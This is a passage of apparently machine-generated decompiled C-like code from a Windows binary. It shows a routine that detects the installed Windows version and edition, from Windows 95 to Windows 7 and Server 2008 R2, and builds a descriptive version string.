    																		__ecx = __ebx & 0x00000003;
    																		__eflags = __ecx;
    																		__eax = memcpy(__edi, __esi, __ecx);
    																		__esi + __ecx = __esi + __ecx + __ecx;
    																		__ecx = 0;
    																	}
    																	__eax = __esp + 0x27c;
    																	__ecx = __esp + 0x10;
    																	_push(__esp + 0x27c);
    																	__eax = E0046E740();
    																	__eflags = __eax;
    																	if(__eax != 0) {
    																		L152:
    																		_push(" BackOffice Small Business Edition");
    																		L153:
    																		__ecx = __esp + 0x1c;
    																		_push(__esp + 0x1c);
    																		__eax = E0047262F(__edx);
    																		__edi = __esp + 0x20;
    																		__ecx = __ecx | 0xffffffff;
    																		__eax = 0;
    																		__esp = __esp + 8;
    																		asm("repne scasb");
    																		__ecx =  !__ecx;
    																		__edi = __edi - __ecx;
    																		__edx = __esp + 0x74;
    																		__esi = __edi;
    																		__ebx = __ecx;
    																		__edi = __edx;
    																		__ecx = __ecx | 0xffffffff;
    																		asm("repne scasb");
    																		__ecx = __ebx;
    																		__edi = __edx - 1;
    																		__ecx = __ebx >> 2;
    																		__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    																		__edi = __esi + __ecx;
    																		__edi = __esi + __ecx + __ecx;
    																		0 = __ebx;
    																		__ecx = __ebx & 0x00000003;
    																		__eflags = __ecx;
    																		__eax = memcpy(__edi, __esi, __ecx);
    																		__esi + __ecx = __esi + __ecx + __ecx;
    																		__ecx = 0;
    																	}
    																	goto L154;
    																}
    																_push(" Advanced Server");
    																L148:
    																__ecx = __esp + 0x1c;
    																_push(__esp + 0x1c);
    																__eax = E0047262F(__edx);
    																__edi = __esp + 0x20;
    																__ecx = __ecx | 0xffffffff;
    																__eax = 0;
    																__esp = __esp + 8;
    																asm("repne scasb");
    																__ecx =  !__ecx;
    																__edi = __edi - __ecx;
    																__edx = __esp + 0x74;
    																__esi = __edi;
    																__ebx = __ecx;
    																__edi = __edx;
    																__ecx = __ecx | 0xffffffff;
    																asm("repne scasb");
    																__ecx = __ebx;
    																__edi = __edx - 1;
    																__ecx = __ebx >> 2;
    																__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    																__edi = __esi + __ecx;
    																__edi = __esi + __ecx + __ecx;
    																0 = __ebx;
    																__ecx = __ebx & 0x00000003;
    																__eflags = __ecx;
    																__eax = memcpy(__edi, __esi, __ecx);
    																__esi + __ecx = __esi + __ecx + __ecx;
    																__ecx = 0;
    																goto L149;
    															}
    															_push(" Datacenter");
    															goto L148;
    														}
    														_push(" Domain Controller");
    														L143:
    														__ecx = __esp + 0x1c;
    														_push(__esp + 0x1c);
    														__eax = E0047262F(__edx);
    														__edi = __esp + 0x20;
    														__ecx = __ecx | 0xffffffff;
    														__eax = 0;
    														__esp = __esp + 8;
    														asm("repne scasb");
    														__ecx =  !__ecx;
    														__edi = __edi - __ecx;
    														__edx = __esp + 0x74;
    														__esi = __edi;
    														__ebx = __ecx;
    														__edi = __edx;
    														__ecx = __ecx | 0xffffffff;
    														asm("repne scasb");
    														__ecx = __ebx;
    														__edi = __edx - 1;
    														__ecx = __ebx >> 2;
    														__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    														__edi = __esi + __ecx;
    														__edi = __esi + __ecx + __ecx;
    														0 = __ebx;
    														__ecx = __ebx & 0x00000003;
    														__eflags = __ecx;
    														__eax = memcpy(__edi, __esi, __ecx);
    														__esi + __ecx = __esi + __ecx + __ecx;
    														__ecx = 0;
    														goto L144;
    													}
    													_push(" Server");
    													goto L143;
    												}
    												_push(" Professional");
    												goto L143;
    											}
    											_push(" Personal");
    											goto L143;
    										}
    										__ecx = __esp + 0x18;
    										_push("Windows XP");
    										_push(__ecx);
    										__eax = E0047262F(__edx);
    										__edi = __esp + 0x20;
    										__ecx = __ecx | 0xffffffff;
    										__eax = 0;
    										__esp = __esp + 8;
    										asm("repne scasb");
    										__ecx =  !__ecx;
    										__edi = __edi - __ecx;
    										__edx = __esp + 0x74;
    										__esi = __edi;
    										__ebx = __ecx;
    										__edi = __edx;
    										__ecx = __ecx | 0xffffffff;
    										asm("repne scasb");
    										__ecx = __ebx;
    										__edi = __edx - 1;
    										__ecx = __ebx >> 2;
    										__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    										__edi = __esi + __ecx;
    										__edi = __esi + __ecx + __ecx;
    										0 = __ebx;
    										__eax = __esp + 0x27c;
    										__ecx = __ebx & 0x00000003;
    										__eax = memcpy(__edi, __esi, __ecx);
    										__esi + __ecx = __esi + __ecx + __ecx;
    										__ecx = 0;
    										__ecx = __esp + 0x14;
    										__eflags = E0046E970(__esp + 0x14, __eflags, __esp + 0x27c);
    										if(__eflags == 0) {
    											__eax = __esp + 0x27c;
    											__ecx = __esp + 0x10;
    											__eflags = E0046E9A0(__esp + 0x10, __eflags, __esp + 0x27c);
    											if(__eflags == 0) {
    												__eax = __esp + 0x27c;
    												__ecx = __esp + 0x10;
    												__eflags = E0046E9F0(__esp + 0x10, __eflags, __esp + 0x27c);
    												if(__eflags == 0) {
    													__eax = __esp + 0x27c;
    													__ecx = __esp + 0x10;
    													__eflags = E0046EAA0(__esp + 0x10, __eflags, __esp + 0x27c);
    													if(__eflags == 0) {
    														L125:
    														__eax = __esp + 0x27c;
    														__ecx = __esp + 0x10;
    														__eflags = E0046EA70(__esp + 0x10, __eflags, __esp + 0x27c);
    														if(__eflags == 0) {
    															__eax = __esp + 0x27c;
    															__ecx = __esp + 0x10;
    															__eax = E0046EA40(__esp + 0x10, __eflags, __esp + 0x27c);
    															__eflags = __eax;
    															if(__eax == 0) {
    																L130:
    																__eax = __esp + 0x27c;
    																__ecx = __esp + 0x10;
    																_push(__esp + 0x27c);
    																__eax = E0046E730();
    																__eflags = __eax;
    																if(__eax == 0) {
    																	L132:
    																	__eax = __esp + 0x27c;
    																	__ecx = __esp + 0x10;
    																	_push(__esp + 0x27c);
    																	__eax = E0046E740();
    																	__eflags = __eax;
    																	if(__eax == 0) {
    																		goto L154;
    																	}
    																	goto L152;
    																}
    																L131:
    																__ecx = __esp + 0x18;
    																_push(" Terminal Services");
    																_push(__ecx);
    																__eax = E0047262F(__edx);
    																__edi = __esp + 0x20;
    																__ecx = __ecx | 0xffffffff;
    																__eax = 0;
    																__esp = __esp + 8;
    																asm("repne scasb");
    																__ecx =  !__ecx;
    																__edi = __edi - __ecx;
    																__edx = __esp + 0x74;
    																__esi = __edi;
    																__ebx = __ecx;
    																__edi = __edx;
    																__ecx = __ecx | 0xffffffff;
    																asm("repne scasb");
    																__ecx = __ebx;
    																__edi = __edx - 1;
    																__ecx = __ebx >> 2;
    																__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    																__edi = __esi + __ecx;
    																__edi = __esi + __ecx + __ecx;
    																0 = __ebx;
    																__ecx = __ebx & 0x00000003;
    																__eflags = __ecx;
    																__eax = memcpy(__edi, __esi, __ecx);
    																__esi + __ecx = __esi + __ecx + __ecx;
    																__ecx = 0;
    																goto L132;
    															}
    															_push(" Advanced Server");
    															L129:
    															__ecx = __esp + 0x1c;
    															_push(__esp + 0x1c);
    															__eax = E0047262F(__edx);
    															__edi = __esp + 0x20;
    															__ecx = __ecx | 0xffffffff;
    															__eax = 0;
    															__esp = __esp + 8;
    															asm("repne scasb");
    															__ecx =  !__ecx;
    															__edi = __edi - __ecx;
    															__edx = __esp + 0x74;
    															__esi = __edi;
    															__ebx = __ecx;
    															__edi = __edx;
    															__ecx = __ecx | 0xffffffff;
    															asm("repne scasb");
    															__ecx = __ebx;
    															__edi = __edx - 1;
    															__ecx = __ebx >> 2;
    															__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    															__edi = __esi + __ecx;
    															__edi = __esi + __ecx + __ecx;
    															0 = __ebx;
    															__ecx = __ebx & 0x00000003;
    															__eflags = __ecx;
    															__eax = memcpy(__edi, __esi, __ecx);
    															__esi + __ecx = __esi + __ecx + __ecx;
    															__ecx = 0;
    															goto L130;
    														}
    														_push(" Datacenter");
    														goto L129;
    													}
    													_push(" Domain Controller");
    													L124:
    													__ecx = __esp + 0x1c;
    													_push(__esp + 0x1c);
    													__eax = E0047262F(__edx);
    													__edi = __esp + 0x20;
    													__ecx = __ecx | 0xffffffff;
    													__eax = 0;
    													__esp = __esp + 8;
    													asm("repne scasb");
    													__ecx =  !__ecx;
    													__edi = __edi - __ecx;
    													__edx = __esp + 0x74;
    													__esi = __edi;
    													__ebx = __ecx;
    													__edi = __edx;
    													__ecx = __ecx | 0xffffffff;
    													asm("repne scasb");
    													__ecx = __ebx;
    													__edi = __edx - 1;
    													__ecx = __ebx >> 2;
    													__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    													__edi = __esi + __ecx;
    													__edi = __esi + __ecx + __ecx;
    													0 = __ebx;
    													__ecx = __ebx & 0x00000003;
    													__eflags = __ecx;
    													__eax = memcpy(__edi, __esi, __ecx);
    													__esi + __ecx = __esi + __ecx + __ecx;
    													__ecx = 0;
    													goto L125;
    												}
    												_push(" Server");
    												goto L124;
    											}
    											_push(" Professional");
    											goto L124;
    										}
    										_push(" Personal");
    										goto L124;
    									}
    									__ecx = __esp + 0x18;
    									_push("Windows 2000");
    									_push(__ecx);
    									__eax = E0047262F(__edx);
    									__edi = __esp + 0x20;
    									__ecx = __ecx | 0xffffffff;
    									__eax = 0;
    									__esp = __esp + 8;
    									asm("repne scasb");
    									__ecx =  !__ecx;
    									__edi = __edi - __ecx;
    									__edx = __esp + 0x74;
    									__esi = __edi;
    									__ebx = __ecx;
    									__edi = __esp + 0x74;
    									__ecx = __ecx | 0xffffffff;
    									asm("repne scasb");
    									__ecx = __ebx;
    									__edi = __esp + 0x74 - 1;
    									__ecx = __ebx >> 2;
    									__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
    									__edi = __esi + __ecx;
    									__edi = __esi + __ecx + __ecx;
    									0 = __ebx;
    									__eax = __esp + 0x27c;
    									__ecx = __ebx & 0x00000003;
    									__eax = memcpy(__edi, __esi, __ecx);
    									__esi + __ecx = __esi + __ecx + __ecx;
    									__ecx = 0;
    									__ecx = __esp + 0x14;
    									__eflags = E0046E820(__esp + 0x14, __eflags, __esp + 0x27c);
    									if(__eflags == 0) {
    										__eax = __esp + 0x27c;
    										__ecx = __esp + 0x10;
    										__eflags = E0046E870(__esp + 0x10, __eflags, __esp + 0x27c);
    										if(__eflags == 0) {
    											__eax = __esp + 0x27c;
    											__ecx = __esp + 0x10;
    											__eflags = E0046E920(__esp + 0x10, __eflags, __esp + 0x27c);
    											if(__eflags == 0) {
    												L108:
    												__eax = __esp + 0x27c;
    												__ecx = __esp + 0x10;
    												__eflags = E0046E8F0(__esp + 0x10, __eflags, __esp + 0x27c);
    												if(__eflags == 0) {
    													__eax = __esp + 0x27c;
    													__ecx = __esp + 0x10;
    													__eax = E0046E8C0(__esp + 0x10, __eflags, __esp + 0x27c);
    													__eflags = __eax;
    													if(__eax == 0) {
    														L113:
    														__eax = __esp + 0x27c;
    														__ecx = __esp + 0x10;
    														_push(__esp + 0x27c);
    														__eax = E0046E730();
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L132;
    														}
    														goto L131;
    													}
    													_push(" Advanced Server");
    													L112:
    													__ecx = __esp + 0x1c;
    													_push(__esp + 0x1c);
    													__eax = E0047262F(__edx);
    													__edi = __esp + 0x20;
    													__ecx = __ecx | 0xffffffff;
    													__eax = 0;
    													__esp = __esp + 8;
    													asm("repne scasb");
    													__ecx =  !__ecx;
    													__edi = __edi - __ecx;
    													__edx = __esp + 0x74;
    													__esi = __edi;
    													__ebx = __ecx;
    													__edi = __edx;
    													__ecx = __ecx | 0xffffffff;
    													asm("repne scasb");
    													__ecx = __ebx;
    													__edi = __edx - 1;
    													__ecx = __ebx >> 2;
    													__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    													__edi = __esi + __ecx;
    													__edi = __esi + __ecx + __ecx;
    													0 = __ebx;
    													__ecx = __ebx & 0x00000003;
    													__eflags = __ecx;
    													__eax = memcpy(__edi, __esi, __ecx);
    													__esi + __ecx = __esi + __ecx + __ecx;
    													__ecx = 0;
    													goto L113;
    												}
    												_push(" Datacenter");
    												goto L112;
    											}
    											_push(" Domain Controller");
    											L107:
    											__ecx = __esp + 0x1c;
    											_push(__esp + 0x1c);
    											__eax = E0047262F(__edx);
    											__edi = __esp + 0x20;
    											__ecx = __ecx | 0xffffffff;
    											__eax = 0;
    											__esp = __esp + 8;
    											asm("repne scasb");
    											__ecx =  !__ecx;
    											__edi = __edi - __ecx;
    											__edx = __esp + 0x74;
    											__esi = __edi;
    											__ebx = __ecx;
    											__edi = __edx;
    											__ecx = __ecx | 0xffffffff;
    											asm("repne scasb");
    											__ecx = __ebx;
    											__edi = __edx - 1;
    											__ecx = __ebx >> 2;
    											__eax = memcpy(__edx - 1, __esi, __ecx << 2);
    											__edi = __esi + __ecx;
    											__edi = __esi + __ecx + __ecx;
    											0 = __ebx;
    											__ecx = __ebx & 0x00000003;
    											__eflags = __ecx;
    											__eax = memcpy(__edi, __esi, __ecx);
    											__esi + __ecx = __esi + __ecx + __ecx;
    											__ecx = 0;
    											goto L108;
    										}
    										_push(" Server");
    										goto L107;
    									}
    									_push(" Professional");
    									goto L107;
    								}
    								__edx = __esp + 0x18;
    								_push("Windows NT");
    								_push(__edx);
    								__eax = E0047262F(__edx);
    								__edi = __esp + 0x20;
    								__ecx = __ecx | 0xffffffff;
    								__eax = 0;
    								__esp = __esp + 8;
    								asm("repne scasb");
    								__ecx =  !__ecx;
    								__edi = __edi - __ecx;
    								__edx = __esp + 0x74;
    								__esi = __edi;
    								__ebx = __ecx;
    								__edi = __esp + 0x74;
    								__ecx = __ecx | 0xffffffff;
    								asm("repne scasb");
    								__ecx = __ebx;
    								__edi = __esp + 0x74 - 1;
    								__ecx = __ebx >> 2;
    								__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
    								__edi = __esi + __ecx;
    								__edi = __esi + __ecx + __ecx;
    								0 = __ebx;
    								__eax = __esp + 0x27c;
    								__ecx = __ebx & 0x00000003;
    								__eax = memcpy(__edi, __esi, __ecx);
    								__esi + __ecx = __esi + __ecx + __ecx;
    								__ecx = 0;
    								__ecx = __esp + 0x14;
    								__eflags = E0046E750(__esp + 0x14, __eflags, __esp + 0x27c);
    								if(__eflags == 0) {
    									__eax = __esp + 0x27c;
    									__ecx = __esp + 0x10;
    									__eflags = E0046E690(__esp + 0x10, __eflags, __esp + 0x27c);
    									if(__eflags == 0) {
    										__eax = __esp + 0x27c;
    										__ecx = __esp + 0x10;
    										__eflags = E0046E640(__esp + 0x10, __eflags, __esp + 0x27c);
    										if(__eflags == 0) {
    											__eax = __esp + 0x27c;
    											__ecx = __esp + 0x10;
    											__eflags = E0046E6E0(__esp + 0x10, __eflags, __esp + 0x27c);
    											if(__eflags == 0) {
    												L96:
    												__eax = __esp + 0x27c;
    												__ecx = __esp + 0x10;
    												__eflags = E0046E7D0(__esp + 0x10, __eflags, __esp + 0x27c);
    												if(__eflags == 0) {
    													__eax = __esp + 0x27c;
    													__ecx = __esp + 0x10;
    													__eax = E0046E7A0(__ecx, __eflags, __esp + 0x27c);
    													__eflags = __eax;
    													if(__eax == 0) {
    														goto L154;
    													}
    													_push(" Enterprise");
    													goto L153;
    												}
    												_push(" Datacenter");
    												goto L153;
    											}
    											_push(" Backup Domain Controller");
    											L95:
    											__ecx = __esp + 0x1c;
    											_push(__esp + 0x1c);
    											__eax = E0047262F(__edx);
    											__edi = __esp + 0x20;
    											__ecx = __ecx | 0xffffffff;
    											__eax = 0;
    											__esp = __esp + 8;
    											asm("repne scasb");
    											__ecx =  !__ecx;
    											__edi = __edi - __ecx;
    											__edx = __esp + 0x74;
    											__esi = __edi;
    											__ebx = __ecx;
    											__edi = __esp + 0x74;
    											__ecx = __ecx | 0xffffffff;
    											asm("repne scasb");
    											__ecx = __ebx;
    											__edi = __esp + 0x74 - 1;
    											__ecx = __ebx >> 2;
    											__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
    											__edi = __esi + __ecx;
    											__edi = __esi + __ecx + __ecx;
    											0 = __ebx;
    											__ecx = __ebx & 0x00000003;
    											__eflags = __ecx;
    											__eax = memcpy(__edi, __esi, __ecx);
    											__esi + __ecx = __esi + __ecx + __ecx;
    											__ecx = 0;
    											goto L96;
    										}
    										_push(" Primary Domain Controller");
    										goto L95;
    									}
    									_push(" Server");
    									goto L95;
    								}
    								_push(" Workstation");
    								goto L95;
    							case 4:
    								__ecx = __esp + 0x18;
    								_push("Windows CE");
    								_push(__ecx);
    								L85:
    								E0047262F(_t736);
    								_t868 = _t854 + 8;
    								asm("repne scasb");
    								_t665 =  !(_t663 | 0xffffffff);
    								_t833 = _t854 + 0x20 - _t665;
    								_t589 = _t665;
    								asm("repne scasb");
    								_t668 = _t589 >> 2;
    								memcpy(_t868 + 0x74 - 1, _t833, _t668 << 2);
    								_t450 = memcpy(_t833 + _t668 + _t668, _t833, _t589 & 0x00000003);
    								_t858 = _t868 + 0x18;
    								goto L158;
    						}
    					}
    					_t481 = _t430 - 1;
    					if(_t481 == 0) {
    						__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
    						if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
    							goto L63;
    						}
    						__eflags =  *(_t851 + 0x1e8);
    						if( *(_t851 + 0x1e8) != 0) {
    							L56:
    							__eflags =  *(_t851 + 0x1e8) - 0xa;
    							if( *(_t851 + 0x1e8) != 0xa) {
    								L60:
    								__eflags =  *(_t851 + 0x1e8) - 0x5a;
    								if( *(_t851 + 0x1e8) == 0x5a) {
    									E00483652(_t847 + 8, "Microsoft Windows Me ");
    									 *(_t847 + 4) = 2;
    								}
    								goto L63;
    							}
    							_t834 = _t847 + 8;
    							E00483652(_t847 + 8, "Microsoft Windows 98 ");
    							__eflags =  *((char*)(_t851 + 0x1f5)) - 0x41;
    							if( *((char*)(_t851 + 0x1f5)) == 0x41) {
    								E00483652(_t834, "SE ");
    							}
    							 *(_t847 + 4) = 1;
    							__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
    							if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
    								goto L63;
    							} else {
    								goto L60;
    							}
    						}
    						_t835 = _t847 + 8;
    						E00483652(_t847 + 8, "Microsoft Windows 95 ");
    						_t487 =  *((intOrPtr*)(_t851 + 0x1f5));
    						__eflags = _t487 - 0x43;
    						if(_t487 != 0x43) {
    							E00483679(_t835, _t487);
    							_push(" ");
    						} else {
    							_push("OSR2 ");
    						}
    						E00483652(_t835);
    						 *(_t847 + 4) = 0;
    						__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
    						if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
    							goto L63;
    						} else {
    							goto L56;
    						}
    					}
    					if(_t481 != 1) {
    						goto L63;
    					} else {
    						if( *((intOrPtr*)(_t851 + 0x1e4)) <= 4) {
    							E00483652(_t847 + 8, "Microsoft Windows NT ");
    						}
    						if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
    							L14:
    							if( *((intOrPtr*)(_t851 + 0x1e4)) != 6) {
    								L23:
    								if( *((intOrPtr*)(_t851 + 0x1e4)) > 4) {
    									L37:
    									 *((intOrPtr*)(_t851 + 0xd8)) = 0x49b54c;
    									 *((intOrPtr*)(_t851 + 0x14c)) = 0;
    									 *((intOrPtr*)(_t851 + 0x128)) = 0x49b548;
    									 *(_t851 + 0x6c) = 4;
    									_t746 =  *0x49b550; // 0x50
    									 *(_t851 + 0x3ac) = 7;
    									 *((intOrPtr*)(_t851 + _t746 + 0xd8)) = 0x49b544;
    									_t119 =  *((intOrPtr*)(_t851 + 0xd8)) + 4; // 0x46da90
    									_t679 =  *_t119;
    									 *((intOrPtr*)(_t851 + _t679 + 0x100)) = _t851 + 0xdc;
    									 *((intOrPtr*)(_t851 + _t679 + 0x104)) = 0;
    									 *((char*)(_t851 + _t679 + 0x108)) = 0x20;
    									_t837 = _t851 + _t679 + 0xd8;
    									_t680 = _t837;
    									E00480102(_t837);
    									__eflags =  *(_t837 + 0x28);
    									if( *(_t837 + 0x28) == 0) {
    										_t129 = _t837 + 4; // 0x46da90
    										_push(0);
    										_t680 = _t837;
    										_t529 =  *_t129 | 4;
    										__eflags = _t529;
    										_push(_t529);
    										E0047FDAB(_t837);
    									}
    									 *(_t851 + 0x3ac) = 9;
    									 *((intOrPtr*)(_t851 + 0x70)) = _t851 + 0xdc;
    									 *(_t851 + 0x110) = E0048062D(_t680);
    									E004804CA(_t851 + 0x14);
    									_t838 =  *0x4e1bb4; // 0x4d01788
    									E004804CA(_t851 + 0x68);
    									_t136 = _t838 + 4; // 0x2
    									_t499 =  *_t136;
    									__eflags = _t499 - 0xffffffff;
    									if(_t499 < 0xffffffff) {
    										_t526 = _t499 + 1;
    										__eflags = _t526;
    										 *(_t838 + 4) = _t526;
    									}
    									E00480566();
    									E00480566();
    									 *((intOrPtr*)(_t851 + 0xe8)) = _t851 + 0xe0;
    									 *((intOrPtr*)(_t851 + 0xec)) = _t851 + 0xe4;
    									 *((intOrPtr*)(_t851 + 0xf8)) = _t851 + 0xf0;
    									 *((intOrPtr*)(_t851 + 0x100)) = _t851 + 0xf4;
    									 *((char*)(_t851 + 0x3b8)) = 0xa;
    									 *((intOrPtr*)(_t851 + 0xe8)) = 0x49b510;
    									 *((intOrPtr*)(_t851 + 0x114)) = _t851 + 0x104;
    									 *((intOrPtr*)(_t851 + 0x118)) = _t851 + 0x108;
    									 *((intOrPtr*)(_t851 + 0xf0)) = 0;
    									 *((intOrPtr*)(_t851 + 0x100)) = 0;
    									 *(_t851 + 0x110) = 0;
    									E0046ADE0(_t851 + 0xe8, 0, 0, 0);
    									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b4dc;
    									 *((intOrPtr*)(_t851 + 0x114)) = 0;
    									 *((intOrPtr*)(_t851 + 0x118)) = 0;
    									 *((intOrPtr*)(_t851 + 0x11c)) = 0x20;
    									 *(_t851 + 0x120) = 4;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xe8)))) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xf8)))) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x108)))) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xec)))) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xfc)))) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x10c)))) = 0;
    									_t170 =  *((intOrPtr*)(_t851 + 0xd8)) + 4; // 0x46da90
    									 *((intOrPtr*)(_t851 +  *_t170 + 0xd8)) = 0x49b4d8;
    									 *(_t851 + 0x3c0) = 0xc;
    									_t512 = E0046AFC0(_t510, E0046A2B0(0, E0046AFC0(_t851 + 0x1f8, E0046AFC0(_t851 + 0x1f8, _t851 + 0xe4, _t851 + 0x1f8), " (Build "), 0x49b4dc, 0x49b4d8, __eflags,  *(_t851 + 0x1ec) & 0x0000ffff), ")");
    									_t851 = _t851 + 0x18;
    									E0046A5B0(_t512, __eflags, 0);
    									 *((intOrPtr*)(_t851 + 0x70)) = _t851 + 0x128;
    									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xd8)) + 4)) + 0xd8)) = 0x49b4d8;
    									 *(_t851 + 0x3ac) = 0xd;
    									_t515 =  *(_t851 + 0x120);
    									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b4dc;
    									__eflags = _t515 & 0x00000001;
    									if((_t515 & 0x00000001) != 0) {
    										E0048302C( *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xe8)))));
    										_t851 = _t851 + 4;
    									}
    									_t823 =  *(_t851 + 0x110);
    									__eflags = _t823;
    									 *((intOrPtr*)(_t851 + 0x118)) = 0;
    									 *(_t851 + 0x120) =  *(_t851 + 0x120) & 0xfffffffe;
    									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b510;
    									if(_t823 != 0) {
    										E004804CA(_t851 + 0x14);
    										_t519 =  *(_t823 + 4);
    										__eflags = _t519;
    										if(_t519 > 0) {
    											__eflags = _t519 - 0xffffffff;
    											if(_t519 < 0xffffffff) {
    												_t522 = _t519 - 1;
    												__eflags = _t522;
    												 *(_t823 + 4) = _t522;
    											}
    										}
    										asm("sbb esi, esi");
    										_t843 =  !( ~( *(_t823 + 4))) & _t823;
    										E00480566();
    										__eflags = _t843;
    										if(_t843 != 0) {
    											 *((intOrPtr*)( *_t843))(1);
    										}
    									}
    									 *(_t851 + 0x3ac) = 0xffffffff;
    									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xd8)) + 4)) + 0xd8)) = 0x49b544;
    									 *((intOrPtr*)(_t851 + 0x128)) = 0x49b548;
    									E00480090(_t851 + 0x128);
    								} else {
    									 *((intOrPtr*)(_t851 + 0x15c)) = 0x49b54c;
    									 *((intOrPtr*)(_t851 + 0x1d0)) = 0;
    									 *((intOrPtr*)(_t851 + 0x1ac)) = 0x49b548;
    									 *(_t851 + 0x6c) = 1;
    									_t756 =  *0x49b550; // 0x50
    									 *(_t851 + 0x3ac) = 0;
    									 *((intOrPtr*)(_t851 + _t756 + 0x15c)) = 0x49b544;
    									_t49 =  *((intOrPtr*)(_t851 + 0x15c)) + 4; // 0x46da90
    									_t702 =  *_t49;
    									 *((intOrPtr*)(_t851 + _t702 + 0x184)) = _t851 + 0x160;
    									 *((intOrPtr*)(_t851 + _t702 + 0x188)) = 0;
    									 *((char*)(_t851 + _t702 + 0x18c)) = 0x20;
    									_t844 = _t851 + _t702 + 0x15c;
    									_t703 = _t844;
    									E00480102(_t844);
    									if( *((intOrPtr*)(_t844 + 0x28)) == 0) {
    										_t59 = _t844 + 4; // 0x46da90
    										_push(0);
    										_t703 = _t844;
    										_t564 =  *_t59 | 4;
    										_t894 = _t564;
    										_push(_t564);
    										E0047FDAB(_t844);
    									}
    									 *(_t851 + 0x3ac) = 2;
    									 *((intOrPtr*)(_t851 + 0x14)) = _t851 + 0x160;
    									 *((intOrPtr*)(_t851 + 0x194)) = E0048062D(_t703);
    									E004804CA(_t851 + 0x68);
    									E0046A1F0();
    									E00480566();
    									 *(_t851 + 0x3ac) = 3;
    									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b510;
    									E0046AF60(_t851 + 0x160);
    									 *((char*)(_t851 + 0x3b8)) = 4;
    									 *((intOrPtr*)(_t851 + 0x16c)) = 0x49b4dc;
    									E0046AE80(_t851 + 0x16c, 0, 0, 4);
    									_t73 =  *((intOrPtr*)(_t851 + 0x15c)) + 4; // 0x46da90
    									 *((intOrPtr*)(_t851 +  *_t73 + 0x15c)) = 0x49b4d8;
    									 *(_t851 + 0x3d4) = 5;
    									_t551 = E0046AFC0(_t549, E0046A2B0(0, E0046AFC0(_t545, E0046AFC0(_t545, E0046AFC0(_t545, E0046A2B0(0, E0046AFC0(_t543, E0046A2B0(0, E0046AFC0(_t851 + 0x17c, _t851 + 0x17c, "version "), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1ec)), "."), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1e8)), " "), _t851 + 0x1fc), " (Build "), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1ec) & 0x0000ffff), ") ");
    									_t851 = _t851 + 0x30;
    									E0046A5B0(_t551, _t894, 0);
    									_t553 =  *((intOrPtr*)(_t851 + 0x1e4));
    									if(_t553 != 4) {
    										__eflags = _t553 - 3;
    										if(_t553 == 3) {
    											__eflags =  *(_t851 + 0x1e8) - 0x33;
    											if( *(_t851 + 0x1e8) == 0x33) {
    												 *(_t847 + 4) = 4;
    											}
    										}
    									} else {
    										 *(_t847 + 4) = 5;
    									}
    									 *((intOrPtr*)(_t851 + 0x14)) = _t851 + 0x1ac;
    									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x15c)) + 4)) + 0x15c)) = 0x49b4d8;
    									 *(_t851 + 0x3ac) = 6;
    									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b4dc;
    									if(( *(_t851 + 0x1a4) & 0x00000001) != 0) {
    										E0048302C( *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x16c)))));
    										_t851 = _t851 + 4;
    									}
    									 *((intOrPtr*)(_t851 + 0x19c)) = 0;
    									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b510;
    									 *(_t851 + 0x1a4) =  *(_t851 + 0x1a4) & 0xfffffffe;
    									if( *((intOrPtr*)(_t851 + 0x194)) != 0) {
    										_t558 = E0046A220();
    										if(_t558 != 0) {
    											 *((intOrPtr*)( *_t558))(1);
    										}
    									}
    									 *(_t851 + 0x3ac) = 0xffffffff;
    									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x15c)) + 4)) + 0x15c)) = 0x49b544;
    									 *((intOrPtr*)(_t851 + 0x1ac)) = 0x49b548;
    									E00480090(_t851 + 0x1ac);
    								}
    								goto L63;
    							}
    							_t566 =  *(_t851 + 0x1e8);
    							if(_t566 != 0) {
    								__eflags = _t566 - 1;
    								if(_t566 != 1) {
    									goto L37;
    								} else {
    									__eflags =  *((char*)(_t851 + 0x27a)) - 1;
    									if( *((char*)(_t851 + 0x27a)) != 1) {
    										E00483652(_t847 + 8, "Windows Server 2008 R2");
    										E004833FF(_t847 + 0x10, "Windows Server 2008 R2");
    										 *(_t847 + 4) = 0xb;
    									} else {
    										E00483652(_t847 + 8, "Windows 7");
    										E004833FF(_t847 + 0x10, "Windows 7");
    										 *(_t847 + 4) = 0xc;
    									}
    									goto L23;
    								}
    							} else {
